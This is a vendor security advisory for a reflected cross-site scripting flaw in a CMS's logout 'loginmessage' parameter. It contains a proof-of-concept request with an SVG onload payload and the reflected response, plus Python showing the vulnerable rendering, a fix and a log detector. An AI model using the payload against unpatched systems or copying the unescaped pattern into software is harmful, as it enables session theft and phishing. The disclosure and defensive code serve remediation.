Reflected Cross-Site Scripting found in the “loginmessage” parameter. 

Issue date: 27-10-2020
Affects versions: 14.2

Security Issue ID

SECURITY-170

Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2


Severity 

high


Description

A reflected cross-site scripting vulnerability occurs when a malicious user is able to inject JavaScript into parameters that are reflected in the response. Because the payload is not stored in the web application, it is only executed if, for example, a malicious link is clicked.

When a user logs out of the application a message is shown: the value of the “loginmessage” parameter in the URL is displayed. This value is output directly, without encoding, so any HTML inserted into the parameter is rendered by the browser. This means that not only is it possible to insert client-side scripts, but a fake HTML login page could also be overlaid on the real one. It looks like the user must be logged out of the CMS for this to work.

Another vulnerable endpoint was the “/cms/console” path. This means that a user who is logged in to the CMS might not be logged in to the console and would thus still be vulnerable. The request below shows the payload:

GET /cms/?0&loginmessage=%3Csvg/onload%3Dalert%281%29%3E HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: -snip-
Upgrade-Insecure-Requests: 1

The response shows the reflected payload:

HTTP/1.1 200
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
X-Frame-Options: sameorigin
Content-Type: text/html;charset=UTF-8
Date: Mon, 08 Jun 2020 00:12:25 GMT
Connection: close
Content-Length: 12452
-snip-
<div class="login-feedback" id="id39">
  <ul class="feedbackPanel">
    <li class="feedbackPanelINFO">
      <span>[Warning: Property for '<svg/onload=alert(1)>' not found]</span>
    </li>
  </ul>
</div>
-snip-

Note that logged-in users are redirected before the “loginmessage” is displayed, so they are not affected.
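As an added illustration (not code from the affected product or from this advisory), the Python below sketches the flawed rendering next to a hardened version that only accepts allowlisted message keys and HTML-encodes its output, plus a simple access-log check that flags requests whose “loginmessage” value carries HTML metacharacters, including double-URL-encoded ones. The message keys, log format and function names are assumptions.

```python
import html
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed allowlist of message keys; the real product's keys are not known here.
KNOWN_LOGIN_MESSAGES = {
    "logout.success": "You have been logged out.",
    "session.expired": "Your session has expired. Please log in again.",
}
DEFAULT_MESSAGE = "Please log in."

def render_feedback_vulnerable(loginmessage: str) -> str:
    """Flawed pattern: an unknown key is echoed verbatim into the HTML feedback panel."""
    text = KNOWN_LOGIN_MESSAGES.get(loginmessage)
    if text is None:
        text = f"[Warning: Property for '{loginmessage}' not found]"
    return f"<span>{text}</span>"

def render_feedback_fixed(loginmessage: str) -> str:
    """Hardened: only allowlisted keys select a message, and the output is always HTML-escaped."""
    text = KNOWN_LOGIN_MESSAGES.get(loginmessage, DEFAULT_MESSAGE)
    return f"<span>{html.escape(text, quote=True)}</span>"

# Characters that have no business in a message key but are needed for HTML/script injection.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

def flag_suspicious_requests(log_lines):
    """Return (line_no, decoded value) for requests whose loginmessage contains HTML metacharacters."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
        for value in qs.get("loginmessage", []):
            decoded = unquote(value)  # parse_qs decoded once; unquote again catches double encoding
            if SUSPICIOUS.search(decoded):
                hits.append((n, decoded))
    return hits

# Constructed access-log lines: the advisory's payload, a benign key, and the payload double-encoded.
LOG_LINES = [
    '127.0.0.1 - - [08/Jun/2020:00:12:25 +0000] "GET /cms/?0&loginmessage=%3Csvg/onload%3Dalert%281%29%3E HTTP/1.1" 200 12452',
    '127.0.0.1 - - [08/Jun/2020:00:13:01 +0000] "GET /cms/?0&loginmessage=logout.success HTTP/1.1" 200 12452',
    '127.0.0.1 - - [08/Jun/2020:00:13:40 +0000] "GET /cms/console/?loginmessage=%253Csvg/onload%253Dalert%25281%2529%253E HTTP/1.1" 200 9000',
]
```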

Instructions

Customers are advised to upgrade to the latest maintenance or minor release as indicated above. This can be done by incrementing the version number of the parent POM of the implementation project.

Credit for discovering this issue

Thomas van Ruitenbeek